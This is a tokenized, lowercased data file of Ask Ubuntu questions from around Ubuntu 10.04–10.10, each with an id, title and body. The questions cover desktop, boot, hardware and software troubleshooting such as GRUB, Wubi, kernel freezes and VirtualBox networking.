14903	hide 'your profile could not be opened correctly '	i have a small public internet cafe , with ubuntu 10.04 and 10.10 . i 'm using google chrome 7.0.517.44 ( 64615 ) , with autoscroll - version : 2.7.5 ; adblock is removed because of high cpu loads , and unconfortable speed of machine . `` your profile could not be opened correctly '' error is displayed : this image is only an illustration . the reason is that i changed permissions of some config files , to do n't remember the history , there are no setting in options , to do n't use history . i 've been removed write permission to : ~/.config/google-chrome $ find . -group nopasswdlogin ./default/archived history ./default/history ./default/visited links when i solved all of my problem , i 'll remove some other write permission , this is a public place . what methods are known to hide this message ? thanks !
14906	no longer able to suspend ... why ?	i used to be able to suspend my ubuntu 10.04 pc just fine , but a few days ago , suspend stopped working for me . does anyone have any idea how i could troubleshoot this ? i 've found the log , but i do n't see anything that indicates that it failed . my screen just goes to black but the computer does n't actually suspend . daryl
14908	how can i prevent audiobooks from appearing in banshee 's 'music ' list	i have a number of audiobooks in mp3 format which , when imported into banshee , appear in the music category . i am able to get them into the audiobooks category by dragging them over , but that still appear in music , and when i try to remove them from the music library , they are also removed from audiobooks . how can i get them to appear only in audiobooks ? nb : they are kept in a separate audiobooks folder , away from the music .
14910	what terminal-based network speed tests are available ?	i 'm looking to find a way to test my internet speed at home through ssh . does anyone know a terminal app that can give me calculations similar info to speedtest.net ? it would also be really cool if there was something that would do tests based on common internet ports too ( i.e . web , torrent , etc ) so you can see if you 're getting throttled by your isp .
14917	how to manually trigger fsync ( ) ?	i 've used libeatmydata to quickly perform apt-get update . now i want to run standard fsync to make sure that everything is written to disk . how can i do it ? preferably a small script / binary , and for bonus points fsync for real even when libeatmydata is pre-loaded
14923	what 's the story with trim support ?	the situation with trim in ubuntu has me utterly confused . i do n't know whether i need to manually run it or not . sources i 've found are disparate and unclear . i have ubuntu 10.04 with latest updates ( including kernel 2.6.32-26 ) . i have an intel x-25m drive with latest firmware , and it is formatted as ext4 . so , does trim support run automatically ? if not , how do i check if i need to run it , and then how do i run it if necessary ?
14925	how do i kill empathy and get it to show its main window ?	empathy shows up in my window picker list and it appears to be started according to the indicator applet and the process manager but i ca n't see any of its windows ! people were sending me messages and there was no empathy window to switch to !
14928	how to check a mounted filesystem for errors in a reliable way	following this question : force fsck.ext4 on reboot , but really `` forceful '' apparently the output of e2fsck -n is not reliable when you use it on a mounted filesystem , so its output should not be trusted . is there any way to check for errors in a mounted filesystem ? just check , not fix . i am more interested in ext4 , because that 's what i use the most .
14933	desktop load ( gnome or netbook edition ) jams after upgrading to 2.6.35 kernel	after upgrading to 2.6.35 kernel , my netbook jams and i need to press the enter key many times to resume the desktop load ( gnome or netbook edition . how to diagnose the problem and identify the root causes ? how can i solve that problem ? extra info : when i choose to boot with the previous kernels with grub , i do n't have this problem anymore .
14935	is there an open 'project ' file format alternative to microsoft 's *.mpp ?	there 's the open document format ( odf ) for word processors , but is there an open standardised format for project files ? i 'm currently using gnome planner which i downloaded from the software centre , but my course teaches us to use openproj , which i do n't really like since it 's pretty sluggish on my computer . i 'm attempting to import the *.planner file from planner into openproj , but it 's not working . planner exports to three different file format : *.planner , *.mrproject and *.html and none of them can be imported to openproj , whose default filetype is *.pod and can also export to *.xml and *.pdf . this all seems a bit messy to me .
14937	will the deleted browser history be stored in file-system ?	i would like to know if the history of urls i browse with my firefox browser , which i have cleared , will be stored in the file system or not ? to be more clear , will the history be stored in some place in the hard-disk , even if the history is deleted from the browser menu ( delete history option ) ? if yes , can i retrieve those details ? thanks , sen
14948	how to cancel the currently-applied remaining sudo time-out ?	when i 've just run sudo , and do n't want it to remain active for the normal duration of its time-out , how can i cancel that remaining active time-out ? sudo -k kills it for the current terminal session , but if a process is currently running in that session and so ca n't run sudo -k , is there a way to cancel it from another terminal session ? and is there a way to disalbe all currently applied sudo times ( for all terminal sessions , and all gksudo running apps.. etc ? ... although , come to think of it . a running gui may simply need to be shut down , but i think alt+f2 caries a memory of the gksu ... . ( just checked it.. yes , alt+f2 does keep the gksu active for subsequent invocations )
14950	getting network manager on the gnome panel	i 've just installed 10.10 from a minimal iso . i 've installed gnome-core and the network manager ( among a few other things ) , and i 've added the notification area to the panel . according to the system monitor , nm-applet is currently running , but i ca n't see it in the notification area . how can i resolve this ? edit : i 've noticed that if i click really close to the right of the notification area i get a nm-applet dropdown box but it says `` device not managed '' under `` wired network '' ( i am connected to the internet though ) , yet there is no nm-applet graphic .
14954	ubuntu professional theme for 10.10 ?	i would like to know about ubuntu 10.10 's new professional themes .
14956	refresh my ubuntu	my ubuntu , after multiple updates , being broken during maverick development , various stuff installed , messing with grub , etc , etc , has taken quite some damage . more specifically : when it starts , it wants to check / for errors . then it says that it has errors , and it wants me to choose if i want to abort , ignore , or try to fix . it ca n't fix them , but if i choose to ignore , it just starts . transmission occupies the whole screen ( above the panels ) , and i ca n't minimize it , even whith alt+space + minimize ( or unmaximize ) . the only way to bring my panels back is to close the transmission window . when i start the pc , the bottom panel is empty , and i need to put the panel items back every time . now i realize that it has taken some serious damage , and i want to know how can i freshen it up , without losing all my installed apps and configuration files .
14961	what is the difference between initrd and initramfs ?	i would like to know , what is the difference between initrd and initramfs ? thanks , sen
14970	broadcom bcm4401-b0 100base-tx issues	i installed ubuntu 10.10 on my dell inspiron 1521 and the lan/ethernet card was working perfectly but ubuntu was displaying a message about not installing the wireless drivers because it was restricted or something along that line . i then went to the synaptic package manager , searched for all broadcom packages and installed them . so far so good . i restarted my computer and to my surprise , my wireless works but my lan is n't ! what the heck could be wrong ? i then uninstalled/removed all the packages i installed earlier hoping my ethernet would start working again but hey , nothing changed . my wireless card works and the ethernet still does n't . is there any way of getting this fixed ? i checked and found my network devices were : broadcom corporation bcm4401-b0 100base-tx ( rev 02 ) broadcom corporation bcm4311 802.11b/g wlan ( rev 01 )
14973	what is the minimum size of the lamp server ?	i installed server 10.10 with lamp+openssh . it is about 1.1gb . can i reduce the total size of the server ? after some experiments the full lamp server is under 1.0gb /dev/sda1 7.5g 914m 6.3g 13 % / it contains php/mysql/apache and gearman-job-server with php support + libfam
14977	generate md5 and other checksums from properties menu ( added `` digests '' tab )	i am trying to restore a function that i had on my last box . it added a tab in the properties menu of any file called `` digests '' . from there i could choose any/all of the hash formats , click hash and it would generate said checksums right there . what i am trying to find out is either the name of the package or acquire the location of it 's installation . i have started a thread on ubuntuforums pertaining to this already
14978	do i need to replace my hard disk ?	whenever i start my computer ubuntu pops up the following error : a hard disk may be failing one or more hard disk report health problems a friend of mine ran some test and it was found that my hard disk has 74 bad sectors . is this merely a software issue that will be solved after a complete format of my hard disk , or is it a hardware issue and i will have to replace my hard disk ? awaiting your responses . thanks , sneha kamath .
14981	glassfish warning when i try to open an existing java project	the project itself is located in my home-directory , netbeans and glassfish each installed to opt . when i start ide and open java project i get following warning five times : /opt/glassfish-3.0.1/glassfish/domains/domain1/config/wss-server-config-2.0.xml ( permission denied ) thanks guys
14982	synchronize folders without internet connection	i want to synchronize two folders between two ubuntu computers but all my web searches come up with ideas to synchronize over the web , but i do not want to do this . the two computers are physically next to each other , so what i want to do is connect them together with a cable and then synchronize . how do i do this , and what sort of cable would i need ?
14986	no wubildr at boot .	i recently installed 10.10 32-bit . before that i ran 10.04 , which worked quite well . booting now takes longer than it did in ubuntu 10.04 , and also shows an error no wubildr ( but ubuntu runs fine later ) . what could be the problem be ?
14988	touchpad too slow -- how do i adjust it ?	apparently this is a recurring problem . i tried system- > preferences- > mouse but it did n't help . there 's a lot of info on the web on this , but it is outdated ( ubuntu 7.04 and 8.04 ) . any tips on how to fix this ?
14989	how do i get the .deb for rhythmbox 0.13.2 to install on ubuntu 9.10 ?	i 'm wanting to get some of the new features in rhythmbox 0.13.2 on my aging ubuntu laptop w/out having to upgrade to the latest version of ubuntu . i 'm currently at 9.10 . one option for installing the new version of rhythmbox is to uninstall the package i have then install the tarball in /usr/local and then figure out which dependencies i need to install . i 'd rather use the package management system to manage the dependencies . this may be an elementary question , but is installing the tarball and looking for the dependencies my only option here ? or can i somehow get the .deb from a repository and install that instead ?
14991	how to open files which are located in virtualbox 's guest machine from netbeans of host machine	i have ubuntu 10.04 installed in my host machine and it has virtualbox . i have guest machine wich runs ubuntu 10.10 . i have netbeans installed in host machine and need to open my project files which are located in guest machine . the reason i need it is because in my working place i have not access to install any applications , that is why i have guest machine where i have web server installed on it and also i have one web application that i am developing . i need to open that web application files from guest machine 's netbeans in order to modify/create new files for my web application . i have configured ssh server of guest machine and added port redirection in the virtualbox so that now i can connect to it from host machine . but i could not find any way to open those files from netbeans . could anybody give me advice about how can i do that please ? update i forgot to say that i do n't want to use sharedfolders .
14997	abnormal increase in laptop temperature	when i boot into ubuntu from my usb pendrive , my laptop fan becomes abnormally loud and the fan temperature also increases ( i can feel the heat by putting my hand under the laptop ) . this does n't happen with windows . i 've done my research , and found out that it may be a problem with the graphics card - i 've got an ati radeon xpress 1100 . quite a lot of people have noted that it may be a problem with ubuntu not being able to handle power management properly with this graphics card . also , i am not running any cpu-intensive or memory-intensive programs - when i go to preferences > system monitor , the memory usage is only around ~250-400 megabytes and the cpu usage hardly ever goes above 20 . my laptop is an asus x51rlseries laptop , by the way . i 'm also just trying ubuntu at the moment - does this have anything to do with the abnormally high fan temperature ? when i actually install ubuntu on a separate partition ( so that i can dual boot both windows and ubuntu ) , will the temperature and fan loudness decrease ? on windows , my hard drive temperature at the moment is 41 degrees celsius , and my cpu temperature is 53 degrees celsius . this is normal for me , and it may increase or decrease slightly depending on the amount of work i am putting on my laptop . i 'm quite a newb at ubuntu yet , so if you could explain instructions clearly to me then i would greatly appreciate it . i know how to do basic stuff , but if you are very detailed then that would be very helpful . if there 's anything i 've missed or if you need to know anything else , then please let me know . thanks .
14998	why does nautilus ask me to `` ... empty the trash before you unmount ? ''	i have a sata hard-drive , formatted as ext4 , which is detected by nautilus each time i boot the computer . i do need to click on it , in places , to actually mount it . that 's okay , i 'm happy with that . however , when i manually unmount it ( via the context menu in nautilus ) , it asks me `` do you want to empty the trash befoe you unmount ? '' ... and this only started happening today , after 2 months of daily use ... now , it could be that i 've never had trash on this drive before today ... it is possible , as i often do a shift+delete , and i do n't do a manual unmount every day ... i was a bit surprised by this dialog , and wonder `` why ? '' ( because trash is typically a place which is manually maintained ) . also , how do i prevent this prompt from appearing ?
14999	how can i make rhythmbox open maximised initially ?	when i launch rhythmbox i always have to go to the panel indicator and choose to show rhythmbox . i have looked at the preferences and see no option to make it show as default . can this be done ?
15000	ca n't turn off or restart	i 'm having problems restarting or turning of ubuntu 10.10 on a samsung r560 . i had no problems with previous ubuntu versions . when turning off , ubuntu stays forever in the purple screen with 4 dots . when restartig , i get init : disconnectded from system bus init : dbus main process ( 752 ) killed by term signal nm-dispatcher.action : cought signal 15 , shutting down ... modem-manager : cought signal 15 , shutting down ... the laptop does not shut down after this .
15010	how to fix choppy fonts after using kde system settings ?	i used kde system settings to configure my kde appearance settings ( i wanted to make kolourpaint look native ) , even though i use gnome . i changed some font settings through it , and now all of my fonts are really choppy . is there any way to revert these changes ?
15012	presentation with many fullscreen video	i am currently creating a presentation ( like power point ) . i have tried multiple applications to create this presentation but there are some problems . i have tried ease : program is not stable crashes randomly openoffice : works fine but video flickers in the beginning and do n't pause in the end . thanks
15017	how can i install java libraries such as the jmonkey engine system-wide ?	i want to install the jmonkey engine system-wide so that all users can use it . where do i put these files ? $ unzip -q jme2_0_1-stabledistribution.zip $ tree -fn jme2_0_1-stabledistribution/jme2_0_1-stabledistribution/ jme2_0_1-stabledistribution/jme2_0_1-stabledistribution/ | -- jme-audio.jar | -- jme-awt.jar | -- jme-collada.jar | -- jme-editors.jar | -- jme-effects.jar | -- jme-font.jar | -- jme-gamestates.jar | -- jme.jar | -- jme-model.jar | -- jme-ogrexml.jar | -- jme-scene.jar | -- jme-swt.jar | -- jme-terrain.jar ` -- lib/ | -- jme-colladabinding.jar | -- jme-colladabinding-src.jar | -- jogl/ | | -- changelog.txt | | -- copyright.txt | | -- gluegen-rt.jar | | -- jogl.jar | | -- license-jogl-1.1.1.txt | ` -- native/ | | -- linux_amd64/ | | | -- libgluegen-rt.so | | | -- libjogl_awt.so | | | -- libjogl_cg.so | | ` -- libjogl.so | | -- linux_i586/ | | | -- libgluegen-rt.so | | | -- libjogl_awt.so | | | -- libjogl_cg.so | | ` -- libjogl.so | | -- macosx/ | | | -- libgluegen-rt.jnilib | | | -- libjogl_awt.jnilib | | | -- libjogl_cg.jnilib | | ` -- libjogl.jnilib | | -- solaris_i586/ | | | -- libgluegen-rt.so | | | -- libjogl_awt.so | | | -- libjogl_cg.so | | ` -- libjogl.so | | -- windows_amd64/ | | | -- gluegen-rt.dll | | | -- jogl_awt.dll | | | -- jogl_cg.dll | | ` -- jogl.dll | ` -- windows_i586/ | | -- gluegen-rt.dll | | -- jogl_awt.dll | | -- jogl_cg.dll | ` -- jogl.dll | -- jorbis/ | | -- copying.txt | ` -- jorbis-0.0.17.jar | -- junit/ | ` -- junit-4.1.jar | -- lwjgl/ | | -- jinput.jar | | -- license.txt | | -- lwjgl.jar | | -- lwjgl_util_applet.jar | | -- lwjgl_util.jar | ` -- native/ | | -- linux/ | | | -- libjinput-linux64.so | | | -- libjinput-linux.so | | | -- liblwjgl64.so | | | -- liblwjgl.so | | | -- libopenal64.so | | ` -- libopenal.so | | -- macosx/ | | | -- libjinput-osx.jnilib | | | -- liblwjgl.jnilib | | ` -- openal.dylib | | -- solaris/ | | | -- liblwjgl.so | | ` -- libopenal.so | ` -- windows/ | | -- jinput-dx8.dll | | -- jinput-raw.dll | | -- lwjgl64.dll | | -- lwjgl.dll | | -- openal32.dll | ` -- openal64.dll | -- mvn-lib-install.sh ` -- swt/ | -- about_files/ | | -- ijg_readme.txt | ` -- mpl-v11.txt | -- about.html | -- linux/ | ` -- swt.jar | -- macosx-carbon/ | ` -- swt.jar | -- macosx-cocoa/ | ` -- swt_fake.jar ` -- windows/ ` -- swt.jar 23 directories , 77 files
15020	how do i make shotwell regenerate all the thumbnails ?	for some unknown reason all thumbnails are lost in my shotwell , instead all icons are grey . the images themselves are all okay and i can open them all in shotwell . there are only empty folders in .shotwell/thumbs/ so it looks like the thumbnails do n't does n't get generated at all . i have also tried to re-install shotwell ( by purge it first ) without any change . how do i make shotwell regenerate all the thumbnails ?
15022	failure to start grub with wubi	my laptop battery ran down and died while using ubuntu 10.04 with wubi . upon recharge ( and restart ) selecting ubuntu from the windows boot menu brings me to the typical prompt which says ( and i paraphrase ) : trying hd ( 0,0 ) on disk ... after that the screen flickers to white ( for a split second ) then black . no grub menu comes up ( as i would expect ) no cursor , no grub sh prompt . nothing . i 've tried switching ttys to no avail . as there are no logs , i ca n't trouble shoot anything . i 've run a check disk from windows ( on the ntfs partition the root.disk is stored ) with no luck . what is causing this failure to load grub ( and , by association ubuntu ) - how can i restore my setup and get ubuntu via wubi working ?
15023	are there guidelines for creating panel icons ?	i 'm looking to submit a patch to a project who 's panel icon is larger than the other icons , specifically it is the full height of the panel , whereas the others have a few pixels of space above and below , and i 'd like to shrink the icon so that it 's consistent with the others . does canonical have any guidelines on the size of these icons , or is it left up to the developers ?
15025	installer wo n't let me continue , forward and skip buttons greyed out	i am currently trying to install ubuntu to a computer , alongside windows xp using a partition . i set up the partition using the installer , and the setup seemed to be working properly . but , as the installation neared completion , it appeared to have stopped . i am currently looking at the menu for customising my username/password , and at the bottom the installer says `` ready when you are ... '' . and , i can not use the skip button , nor can i click the forward button to continue . also , there appears to be an error log , if that would help . does anyone know how to fix this ( or , if there is a problem at all ) ? would it be unsafe to reset my computer during this phase of installation ? this is my first time setting up a computer to use ubuntu , so i really have no idea if there 's something i should be doing to fix this .
15028	is there ruby syntax validation plugin for gedit ?	i am using the https : //github.com/gmate/gmate setup , but it lacks a ruby syntax validation plugin . where can i find one ? tnx !
15029	how can i use my fingerprint reader ?	i have an hp dv4 2080br with a fingerprint reader that works fine on windows 7. lsusb lists it as bus 001 device 004 : id 138a:0005 digitalpersona how can i use it on ubuntu 10.10 ?
15031	tomboy is reporting an error when i try to sync to ubuntu one , but is n't giving an error message	whenever i try to sync my tomboy notes with ubuntu one , i get the following window : from the non-message presented here i have no idea what do to to troubleshoot this problem . i 've tried unistalling and reinstalling the ubuntu one app and the problem persists . my next option would be to do the same with tomboy itself , but i 'm unsure what will happen to my notes if i do that . is it a good idea to try reinstalling tomboy , or is there another way to go about fixing this . nb : i think this happened when i reinstalled my system without formatting my drive after 10.10 came out , and something was perhaps broken in the process .
15033	wubi has an error now directs to menu	when booting i have the option to select ubuntu or windows but when selecting ubuntu instead of going to ubuntu boot screen it goes to the ubuntu boot menu where you can select , kernel or another version of ubuntu . why is this ? can this be fixed by wubi ?
15035	which package contains the c standard library ?	which package contains the c standard library ?
15043	why does n't canonical use pings from the update manager to gauge the size of the ubuntu installbase ?	i 've heard from many people , jono bacon included , that it 's impossible to say how many computers are running ubuntu since there is nothing in the os that phones home , and the ubuntu census package is only installed on oem machines sold with ubuntu . this 'phone home ' count is important since the marketshare of an os is based on the number of units sold which is rather disingenuous when you consider that many , if not most , ubuntu installations are running on computers that were purchased running windows , or even mac os . does n't the update manager phone home when it 's figuring out if there 's anything to download ?
15050	how do i bind .sh files to keyboard combination ?	just wondering ; how do i bind .sh files to run when i press a particular key combination ? ( like alt+s ) thanks , dante
15053	how to enable graphics card xfx ati radeon hd 4350	i need to enable the 3d effects in the graphics card under ubuntu 10.10 os
15055	can not find grub configuration file	i have been looking for the grub configuration file , and i have n't had much luck . according to the sites i found , it should be at '/boot/grub/menu.lst ' . but , i went to that file path , and could not find menu.lst . can anyone tell me why it is n't there , and where i might locate it ? i would like to change the default system to boot , but i can not find any related files to help me .
15058	right click to open a terminal in kubuntu ?	on work , i am using fedora , where a right click on desktop opens a menu , which allows opening a terminal . home , i have kubuntu installed . is it possible to have the same behavior ?
15060	how to make the webcam work on a toshiba satelite l300 ?	skype beta 2 on ubuntu 10.10 64 bit , how do i make the webcam work on toshiba satellite l300 . also i can not add contacts
15066	root password does not work to install some programs	i have a root user with password and an ordinary user with a seperate password . when trying to configure fire wall ufw , it will not accept my root password . is it to do with advanced bin/bash etc on setting up passwords and users ?
15069	how do i change the way ubuntu adjusts my volume mixer levels ?	i 've had a mildly annoying problem with my sound for quite awhile now , and i 've finally decided it 's time to do something about it . every time i adjust the main volume slider in the toolbar , or use my volume hotkeys on my laptop , ubuntu adjusts my mixer levels in a strange way . when i open gnome alsa mixer , i notice that there are three output sliders for my sigmatel stac9200 : master , pcm , and lfe . master and lfe both have mute checkboxes . when i press my volume up hotkey once , master and lfe unmute , and the sliders for pcm and lfe jump up about halfway . the master slider stays at zero . another press brings pcm and lfe up to about 4/5 , and master remains unmoved at the bottom . ubuntu does n't move master until pcm and lfe are maxed out , which occurs between about 15 % -20 % on the main output mixer . the effect of this is that i do n't get any sound at all until about 15 % -20 % ( since master is at zero ) , and when i cross that threshold , i immediately get a loud bassy sound ( from the lfe apparently ) . if i use headphones , i still do n't get any sound until that threshold , but at least it does n't blast me when i do get sound . is there anything in pulseaudio configuration or anywhere else that could change the behavior of my output mixer ?
15072	only able to login to failsafe gnome	installed ubuntu using wubi , when i reboot , i 'm able to login as `` failsafe gnome '' and xterm , but not as just gnome . what is the likely source of the issue ? hardware , bad install , etc. ? version : ubuntu 10.04.1 lts ( lucid lynx ) wubi ( on windows xp pro sp3 , basically all updates ) hardware : powerspec 6245 , processor : amd athlonâ˘ xp processor 2800+ when i login as gnome , it takes the username/password , then screen goes black for 1-second , then flashes back to the login . at first i thought i forgot the admin password , but figured out i was able to login as xterm , then as failsafe gnome . any suggests ? thanks ! update ( 1 ) : from failsafe , i 'm able to change the default screen size/hz ( which is correct for the monitor ) to 800x600 , and then login as gnome . if i change it back to the default via gnome , i 'm not able to login . update ( 2 ) : posted a follow up question focus on possible wubi resource conflicts here . and info on a strange issue related to how changing the screen background results in the same pattern of the login failing . update ( 3 ) : given up on ubuntu , do n't have time for this , would delete the question , but there 's too many answers . so , i 'll just leave it unanswered .
15074	unable to install gnome	hey ! i have ubuntu server 10.10 . i am trying to install gui . i have installed these packages : xserver-xorg xinit i tried installing gnome but i always get this error : the following packages have unmet dependencies : gnome : depends : gnome-desktop-environment ( > = 1:2.28+1ubuntu4 ) but it is not going to be installed depends : epiphany-extensions but it is not going to be installed i ca n't seem to find the epiphany-extensions . this is my source.list file : deb http : //pt.archive.ubuntu.com/ubuntu/ maverick main restricted deb-src http : //pt.archive.ubuntu.com/ubuntu/ maverick main restricted deb http : //pt.archive.ubuntu.com/ubuntu/ maverick-updates main restricted deb-src http : //pt.archive.ubuntu.com/ubuntu/ maverick-updates main restricted deb http : //pt.archive.ubuntu.com/ubuntu/ maverick universe deb-src http : //pt.archive.ubuntu.com/ubuntu/ maverick universe deb http : //pt.archive.ubuntu.com/ubuntu/ maverick-updates universe deb-src http : //pt.archive.ubuntu.com/ubuntu/ maverick-updates universe deb http : //pt.archive.ubuntu.com/ubuntu/ maverick multiverse deb-src http : //pt.archive.ubuntu.com/ubuntu/ maverick multiverse deb http : //pt.archive.ubuntu.com/ubuntu/ maverick-updates multiverse deb-src http : //pt.archive.ubuntu.com/ubuntu/ maverick-updates multiverse deb http : //pt.archive.ubuntu.com/ubuntu/ maverick-backports main restricted universe multiverse deb-src http : //pt.archive.ubuntu.com/ubuntu/ maverick-backports main restricted universe multiverse deb http : //archive.canonical.com/ubuntu maverick partner deb-src http : //archive.canonical.com/ubuntu maverick partner deb http : //extras.ubuntu.com/ubuntu maverick main deb-src http : //extras.ubuntu.com/ubuntu maverick main deb http : //security.ubuntu.com/ubuntu maverick-security main restricted deb-src http : //security.ubuntu.com/ubuntu maverick-security main restricted deb http : //security.ubuntu.com/ubuntu maverick-security universe deb-src http : //security.ubuntu.com/ubuntu maverick-security universe deb http : //security.ubuntu.com/ubuntu maverick-security multiverse deb-src http : //security.ubuntu.com/ubuntu maverick-security multiverse what can i do to correct this ? how can i find a source url that has the package i need ? ?
15076	why does tasksel not include an option for lamp server ?	i recently downloaded an ubuntu 9.10 virtual appliance for vmware and want to install a lamp server on it . normally , i would just sudo tasksel install lamp-server but that seems to just return without doing anything . so i tried sudo tasksel to bring up the list of packages . but this list only includes three options ... print server , ubuntu desktop and manual package selection . i thought maybe it was in manual package selection but i did n't see it . i 'm pretty new to ubuntu ( and linux in general ) so i 'm not sure where to go next . the only posts i 've found about missing options in tasksel says it just suddenly started showing additional options the next day ... why do n't i have all the options i usually do ( like lamp server ) ? how can i get these options back ?
15077	how do i report a bug against ubuntu.com ( the ubuntu website )	since the website and wiki have been redesigned , the text is not always readable . the footer text overwrites other text , the links are not uniform colors , and the colors use blend and blur the text . what is the proper procedure to report these and other issues with this website ? i have reported bugs in launchpad against https : //bugs.launchpad.net/ubuntu-website , but the team that maintains the ubuntu website is not part of that project . it is used instead for the wiki websites only .
15079	the new kernel causes system freeze	i recently updated my netbook ( asus 1005px ) running ubuntu 10.10 . the update came with a newer kernel . and it causes the system to freeze . randomly the screen goes off , and i have to do a force shutdown . i tried selecting older kernel in the grub menu and it works fine . now i want to set the older kernel as default , or i want to get rid of the new kernel . what is the best way of doing this ?
15082	will there be something like apple 's quicklook included by default ?	you know ... to compete with mac os x . or will we have to install 'gloobus ' manually ?
15088	system crashed suddenly and does not boot after that -- because of ubuntu only	i was watching video on youtube and suddely system crashed and then i tried to restart the machine but it just gets to the dual boot menu and after that shuts down again.. i think this is because of ubuntu only ... because i am able to run ubuntu from live cd.. please tell me if there is anything i can do ... right now i am posting this question from my desktop..
15090	how to play vob files that were inside a dvd disc ?	i just downloaded a dvd which is for a movie . after uncompressing the dvd file i see .vob , .ifo and .bup files . if i open the first .vob file it shows me the dvd menu but i ca n't interact with it . so , my question is ... is totem able to play those kind of files ? if so , how can i achieve that ? what other app could i use in order to reproduce those files ? edit using vlc did n't work neither . i forgot to mention i have already tried that . let me rephrase : if i open the first video file it shows the dvd menu , but i ca n't interact with it .
15093	how can i install a .bin file ?	i want to update acrobat reader for firefox , but the download has the .bin extension . how can i install it ?
15096	how to unify kde 4.5 theme when running kde applications with root ?	i am using kubuntu with kde 4.5.3 . when i run kde applications with root privilage the theme/ui does not look same/unify with my theme . how to fix it ?
15099	why does it always say `` requires installation of untrusted packages '' and not let me download ?	as the title above asks , why ca n't i install any packages ? i tried installing emesene ( other applications wont install either , just using emesene as an example ) but it wont download due to `` untrusted packages '' and gives me `` emesene python-libmimic '' when i click details . what 's wrong ? before this i have installed things like ktorrent , vlc media player , audacity and the like but since then nothing works .
15102	how to launch user application from gmrun	i installed eclipse on ubuntu 10.04 by copying eclipse folder to /opt folder . now i would like to launch eclipse from gmrun dialog box by typing eclipse how do i do that ? in windows to launch eclipse from run dialog box i copy the short cut of the application and paste it in windows/system32..is there some thing like that in ubuntu ?
15108	why is $ path different in the nautilus-elementary embedded terminal ?	i 'm running ubuntu 10.10 with nautilus-elementary installed . when i open the embedded terminal in nautilus ( f7 ) and run echo $ path , i get : /usr/bin : /bin : ./usr/local/bin : /bin when run the same command in the regular terminal , i get : /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games is there some logic in this behavior , is this a bug , or did i just forget to configure something ?
15115	i ca n't get click and drag to work with my wacom bamboo p & t	i get my wacom bamboo pen & touch apparently working ( by using martin owens ' ppa ) , but whenever i try to click and drag something -- for example to move a window -- it will only register as a click . in other words : the `` button up '' event is generated right after the `` button down '' event no matter how long i hold it in . this is the same whether i use the tip of the pen , the buttons on the pen or the buttons on the pad . however : clicking and dragging works perfectly in the login-screen , both before logging in for the first time and after logging out .
15117	multi-user remote desktop using vnc4server	i have setup vnc4server on the main pc using this howto and i only see this : what is the problem ? does it matter if the client i 'm connecting from uses different de than the main pc ?
15119	`` a hard disk may be failing '' , but no additional info via gdu-notification-deamon ( suggestions ? )	got this message after logging in : a hard disk may be failing one or more hard disk report health problems . click the icon to get more information . on wubi and 10.04 , there was no icon to click , and clicking on made the message go away . after rebooting , the message did not display again . i 've got everything on all my hard drives in duplicate , so not super worried about a disk failure , though i am wondering why the message had no info on which disk it thought had problems . suggestions ?
15123	why are two indicator-network versions being worked on ?	some months ago , on the road to ubuntu maverick , a new system indicator , network ( with connman as a backend ) , started to be developed . the plan was to get it into une and release it with no notifcation area . unfortunately it did n't make it into the final version . however , continued efforts are still being made to improve it , and i 'm getting regular updates . from a blueprint from the last uds , i read that the plan was to ship no notification area and only indicators . for that , it was defined that nm-applet ( backend : networkmanager ) should be ported to the appindicator library . today i discovered that those efforts are going on and a initial version is available for testing , available from matt trudel ppa ( natty only ) . so , my questions is , to whoever has the necessary info : would n't it be easier to join efforts and concentrate the work in just one version ( probably networkmanager backend , as that 's the official plan ) , instead of breaking those efforts apart and hampering both testing and developing ? both indicators are being developed by canonical engineers , and that really does n't make much sense . so , any canonical engineer willing to clarify this ?
15125	can not play vcd	i am using ubuntu 10.10 64bit . the problem is that no vcd 's can be played . i tried totem , mplayer , vlc etc etc . none of the players can render the file and show either show i/o error or parse error . i even tried copying the .dat files but it shows me a permission denied error ( even in root mode file browser ) . vcd 's work in windows as well as vcd player . so neither the discs nor the drive is faulty . any help will be appreciated . thanks in advance
15127	rss reader that can sync across computers ?	i am using ubuntu 10.10 64bit . i am in need of a service or a reader that can synchronise my feeds across computers and platforms , something like feeddemon has for windows . rssowl is by far the best reader i have come across , but it lacks this feature . i dont want to use online readers like google reader . any suggestions would be appreciated .
15128	how should i manage a secure , personal ssh key ?	i need to have a personal ssh key such that : i can back up a single file containing my private key , and restore it when i do a new install . the private key is never stored in unencrypted form anywhere , including in the file that i back up and restore , but with the necessary exception of my ram while i am using it . someone with physical access to my machine can not necessarily use my private key . i should be required to enter a password before it will work , preferably the password to my user account . it is not necessary to back up the public key . i should be able to generate that from the private key ( but may need sufficient information to decrypt it ) . i know that there are a lot of resources explaining how to use ssh key management tools . however , i find them quite complex , and i have proven unable to save my private key when doing new installs in the past . so i would much rather hear some best practices from someone with experience doing exactly what i want to do .
15132	ftp access to the files of guest machine of virtualbox from host machine	i have installed pure-ftpd in the guest machine . i tried to connect to ftp server of guest machine from guest machine with the port number 21 and i could connect to it successfully . in the host machine i have added following command in order to redirect host 's port 2121 into guest 's port 21 and connect to ftp server of guest machine . vboxmanage setextradata ubuntu `` vboxinternal/devices/e1000/0/lun # 0/config/ftp/hostport '' 2121 vboxmanage setextradata ubuntu `` vboxinternal/devices/e1000/0/lun # 0/config/ftp/guestport '' 21 vboxmanage setextradata ubuntu `` vboxinternal/devices/e1000/0/lun # 0/config/ftp/protocol '' tcp but once i tried to access this guest ftp server from host machine it asked me a password for the user i have in guest machine and authentication passed successfully . but when it tried to list directories it showed me an error message saying following : if you translate it into enlgish , it will be following : the folder contents could not be displayed . could not display the entire contents of `` / in localhost:2121 '' : can not open data connection . maybe your firewall is blocking it ? how to solve the problem ?
15137	how do i connect to the internet with a `` huwaei ec1260 '' modem ?	i have a reliance netconnect huwaei ec1260 modem . how can i use this to connect to the internet ?
15141	no video after update ( 10.04 ) , how do i rescue ?	i recently performed a routine update , which included a new kernel rev among other things , and now my ubuntu 10.04 system boots into a blank screen . i 'd like to get to the grub menu to try selecting the previous kernel rev , but it starts booting to disk immediately . holding down the shift key does n't bring up the menu . i can boot into the install cd , but i do n't know if/how i can use this to rescue . i saw a post somewhere that the `` alternate install '' iso may have a recover option ? is this what i need to do ? edit : i was able to modify grub options via the install cd by following this advice . i edited /boot/grub/menu.lst and increased the timeout and commented out the 'hidden ' option . then i was able to reboot , see the grub menu , select 'rescue mode ' from the grub menu , and when prompted i selected `` low graphics option . '' and ( at least temporarily ) i can get my desktop . now the question is : how do i reconfigure my display ?
